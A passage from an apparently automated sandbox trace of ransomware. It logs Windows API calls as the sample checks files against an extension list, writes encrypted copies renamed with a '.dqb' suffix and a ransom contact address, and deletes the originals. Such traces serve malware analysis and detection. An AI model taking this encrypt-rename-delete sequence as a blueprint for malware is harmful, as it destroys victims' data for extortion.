lpString2=".WMF") returned -1 [0274.898] lstrlenW (lpString=".7z") returned 3 [0274.898] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0274.898] lstrlenW (lpString=".dbf") returned 4 [0274.898] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0274.898] lstrlenW (lpString=".1cd") returned 4 [0274.898] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.899] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0274.899] lstrlenW (lpString=".jpg") returned 4 [0274.899] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.899] lstrcmpiW (lpString1=".WMF", lpString2=".dqb") returned 1 [0274.899] lstrlenW (lpString="FD00074_.WMF") returned 12 [0274.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0274.899] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=17850) returned 1 [0274.899] CloseHandle (hObject=0x31c) returned 1 [0274.899] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf")) returned 0x20 [0274.899] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0274.900] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.900] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0274.900] GetLastError () returned 0x0 [0274.900] ReadFile (in: hFile=0x31c, lpBuffer=0x37e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fed4, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesRead=0x2c0fed4*=0x45ba, lpOverlapped=0x0) returned 1 [0274.902] WriteFile (in: hFile=0x330, lpBuffer=0x37e0020*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x2c0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesWritten=0x2c0fc9c*=0x45c0, lpOverlapped=0x0) returned 1 [0274.903] ReadFile (in: hFile=0x31c, lpBuffer=0x37e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fed4, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesRead=0x2c0fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.903] WriteFile (in: hFile=0x330, lpBuffer=0x37e0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesWritten=0x2c0fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.903] SetEndOfFile (hFile=0x330) returned 1 [0274.903] CloseHandle (hObject=0x330) returned 1 [0274.903] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.903] SetEndOfFile (hFile=0x31c) returned 1 [0274.906] CloseHandle (hObject=0x31c) returned 1 [0274.906] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.906] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00074_.wmf")) returned 1 [0274.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0274.906] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0274.906] lstrlenW (lpString=".doc") returned 4 [0274.906] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.906] lstrlenW (lpString=".docx") returned 5 [0274.906] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.906] lstrlenW (lpString=".pdf") returned 4 [0274.906] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.906] lstrlenW (lpString=".xls") returned 4 [0274.906] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.906] lstrlenW (lpString=".xlsx") returned 5 [0274.906] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.907] lstrlenW (lpString=".ppt") returned 4 [0274.907] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0274.907] lstrlenW (lpString=".zip") returned 4 [0274.907] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.907] lstrlenW (lpString=".rar") returned 4 [0274.907] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.907] lstrlenW (lpString=".bz2") returned 4 [0274.907] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.907] lstrlenW (lpString=".7z") returned 3 [0274.907] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0274.907] lstrlenW (lpString=".dbf") returned 4 [0274.907] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0274.907] lstrlenW (lpString=".1cd") returned 4 [0274.907] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.907] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0274.907] lstrlenW (lpString=".jpg") returned 4 [0274.907] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0274.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0274.908] lstrlenW (lpString=".doc") returned 4 [0274.908] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.908] lstrlenW (lpString=".docx") returned 5 [0274.908] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.908] lstrlenW (lpString=".pdf") returned 4 [0274.908] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.908] lstrlenW (lpString=".xls") returned 4 [0274.908] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.908] lstrlenW (lpString=".xlsx") returned 5 [0274.908] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.908] lstrlenW (lpString=".ppt") returned 4 [0274.908] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0274.908] lstrlenW (lpString=".zip") returned 4 [0274.908] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.908] lstrlenW (lpString=".rar") returned 4 [0274.908] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.908] lstrlenW (lpString=".bz2") returned 4 [0274.953] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.953] lstrlenW (lpString=".7z") returned 3 [0274.953] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0274.953] lstrlenW (lpString=".dbf") returned 4 [0274.953] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0274.953] lstrlenW (lpString=".1cd") returned 4 [0274.953] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.953] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00074_.WMF") returned 63 [0274.954] lstrlenW (lpString=".jpg") returned 4 [0274.954] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.954] lstrcmpiW (lpString1=".WMF", lpString2=".dqb") returned 1 [0274.954] lstrlenW (lpString="FD00076_.WMF") returned 12 [0274.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00076_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 94 os_tid = 0x664 [0268.598] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x6a2d58 [0268.598] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x6b2d60 [0268.598] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634ec8 [0268.598] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x6619d0 [0268.598] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634ee0 [0268.598] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x38f0020 [0268.599] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634ef8 [0268.599] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634ef8, Size=0x20) returned 0x65b738 [0268.599] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634ef8 [0268.599] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634ef8, Size=0x20) returned 0x65b710 [0268.599] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0268.599] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0268.599] Wow64DisableWow64FsRedirection (in: OldValue=0x2d4ff58 | out: OldValue=0x2d4ff58*=0x0) returned 1 [0268.599] lstrlenW (lpString="kernel32.dll") returned 12 [0268.599] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b738 | out: hHeap=0x5e0000) returned 1 [0268.599] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0268.599] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b710 | out: hHeap=0x5e0000) returned 1 [0268.599] Sleep (dwMilliseconds=0x64) [0268.983] Sleep (dwMilliseconds=0x64) [0269.251] lstrcmpiW (lpString1=".dat", lpString2=".dqb") returned -1 [0269.251] lstrlenW (lpString="bootsqm.dat") returned 11 [0269.252] CreateFileW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.371] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d4ff1c | out: lpFileSize=0x2d4ff1c*=3264) returned 1 [0269.371] CloseHandle (hObject=0x1f4) returned 1 [0269.371] GetFileAttributesW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat")) returned 0x80 [0269.371] GetFileAttributesW (lpFileName="C:\\bootsqm.dat.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\bootsqm.dat.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.371] CreateFileW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.371] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.371] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.371] CreateFileW (lpFileName="C:\\bootsqm.dat.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\bootsqm.dat.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0269.373] GetLastError () returned 0x0 [0269.373] ReadFile (in: hFile=0x1f4, lpBuffer=0x38f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fed4, lpOverlapped=0x0 | out: lpBuffer=0x38f0020*, lpNumberOfBytesRead=0x2d4fed4*=0xcc0, lpOverlapped=0x0) returned 1 [0269.390] WriteFile (in: hFile=0x1f8, lpBuffer=0x38f0020*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x2d4fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38f0020*, lpNumberOfBytesWritten=0x2d4fc9c*=0xcd0, lpOverlapped=0x0) returned 1 [0269.390] ReadFile (in: hFile=0x1f4, lpBuffer=0x38f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fed4, lpOverlapped=0x0 | out: lpBuffer=0x38f0020*, lpNumberOfBytesRead=0x2d4fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.390] WriteFile (in: hFile=0x1f8, lpBuffer=0x38f0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d4fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38f0020*, lpNumberOfBytesWritten=0x2d4fc9c*=0xea, lpOverlapped=0x0) returned 1 [0269.390] SetEndOfFile (hFile=0x1f8) returned 1 [0269.391] CloseHandle (hObject=0x1f8) returned 1 [0269.391] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.391] SetEndOfFile (hFile=0x1f4) returned 1 [0269.391] CloseHandle (hObject=0x1f4) returned 1 [0269.392] SetFileAttributesW (lpFileName="C:\\bootsqm.dat.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x80) returned 1 [0269.392] DeleteFileW (lpFileName="C:\\bootsqm.dat" (normalized: "c:\\bootsqm.dat")) returned 1 [0269.392] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0269.392] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0269.392] lstrlenW (lpString=".doc") returned 4 [0269.392] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0269.392] lstrlenW (lpString=".docx") returned 5 [0269.392] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0269.392] lstrlenW (lpString=".pdf") returned 4 [0269.392] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0269.392] lstrlenW (lpString=".xls") returned 4 [0269.392] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0269.392] lstrlenW (lpString=".xlsx") returned 5 [0269.392] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0269.392] lstrlenW (lpString=".ppt") returned 4 [0269.392] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0269.392] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0269.392] lstrlenW (lpString=".zip") returned 4 [0269.392] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0269.392] lstrlenW (lpString=".rar") returned 4 [0269.393] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0269.393] lstrlenW (lpString=".bz2") returned 4 [0269.393] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0269.393] lstrlenW (lpString=".7z") returned 3 [0269.393] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0269.393] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0269.393] lstrlenW (lpString=".dbf") returned 4 [0269.393] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0269.393] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0269.393] lstrlenW (lpString=".1cd") returned 4 [0269.393] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0269.393] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0269.393] lstrlenW (lpString=".jpg") returned 4 [0269.393] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0269.393] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0269.393] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0269.393] lstrlenW (lpString=".doc") returned 4 [0269.393] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0269.393] lstrlenW (lpString=".docx") returned 5 [0269.393] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0269.393] lstrlenW (lpString=".pdf") returned 4 [0269.393] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0269.393] lstrlenW (lpString=".xls") returned 4 [0269.393] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0269.393] lstrlenW (lpString=".xlsx") returned 5 [0269.393] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0269.393] lstrlenW (lpString=".ppt") returned 4 [0269.393] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0269.393] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0269.393] lstrlenW (lpString=".zip") returned 4 [0269.393] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0269.393] lstrlenW (lpString=".rar") returned 4 [0269.394] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0269.394] lstrlenW (lpString=".bz2") returned 4 [0269.394] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0269.394] lstrlenW (lpString=".7z") returned 3 [0269.394] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0269.394] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0269.394] lstrlenW (lpString=".dbf") returned 4 [0269.394] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0269.394] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0269.394] lstrlenW (lpString=".1cd") returned 4 [0269.394] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0269.394] lstrlenW (lpString="C:\\bootsqm.dat") returned 14 [0269.394] lstrlenW (lpString=".jpg") returned 4 [0269.394] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0269.394] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0269.394] lstrlenW (lpString="boxed-join.avi") returned 14 [0269.394] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.422] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2d4ff1c | out: lpFileSize=0x2d4ff1c*=33280) returned 1 [0269.422] CloseHandle (hObject=0x1f4) returned 1 [0269.422] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20 [0269.422] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.422] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0269.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0269.422] lstrlenW (lpString=".doc") returned 4 [0269.422] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.422] lstrlenW (lpString=".docx") returned 5 [0269.422] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0269.423] lstrlenW (lpString=".pdf") returned 4 [0269.423] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.423] lstrlenW (lpString=".xls") returned 4 [0269.423] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.423] lstrlenW (lpString=".xlsx") returned 5 [0269.423] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0269.423] lstrlenW (lpString=".ppt") returned 4 [0269.423] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0269.423] lstrlenW (lpString=".zip") returned 4 [0269.423] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.423] lstrlenW (lpString=".rar") returned 4 [0269.423] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.423] lstrlenW (lpString=".bz2") returned 4 [0269.423] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.423] lstrlenW (lpString=".7z") returned 3 [0269.423] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0269.423] lstrlenW (lpString=".dbf") returned 4 [0269.423] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0269.423] lstrlenW (lpString=".1cd") returned 4 [0269.423] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0269.423] lstrlenW (lpString=".jpg") returned 4 [0269.423] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0269.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0269.423] lstrlenW (lpString=".doc") returned 4 [0269.423] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.423] lstrlenW (lpString=".docx") returned 5 [0269.423] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0269.424] lstrlenW (lpString=".pdf") returned 4 [0269.424] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.424] lstrlenW (lpString=".xls") returned 4 [0269.424] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.424] lstrlenW (lpString=".xlsx") returned 5 [0269.424] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0269.424] lstrlenW (lpString=".ppt") returned 4 [0269.424] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0269.424] lstrlenW (lpString=".zip") returned 4 [0269.424] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.424] lstrlenW (lpString=".rar") returned 4 [0269.424] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.424] lstrlenW (lpString=".bz2") returned 4 [0269.424] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.424] lstrlenW (lpString=".7z") returned 3 [0269.424] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0269.424] lstrlenW (lpString=".dbf") returned 4 [0269.424] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0269.424] lstrlenW (lpString=".1cd") returned 4 [0269.424] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0269.424] lstrlenW (lpString=".jpg") returned 4 [0269.424] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.424] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0269.424] lstrlenW (lpString="delete.avi") returned 10 [0269.424] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.442] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x2d4ff1c | out: lpFileSize=0x2d4ff1c*=224256) returned 1 [0269.442] CloseHandle (hObject=0x1f0) returned 1 [0269.442] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20 [0269.442] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.442] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.442] lstrlenW (lpString="C:\\Program Files\\Common 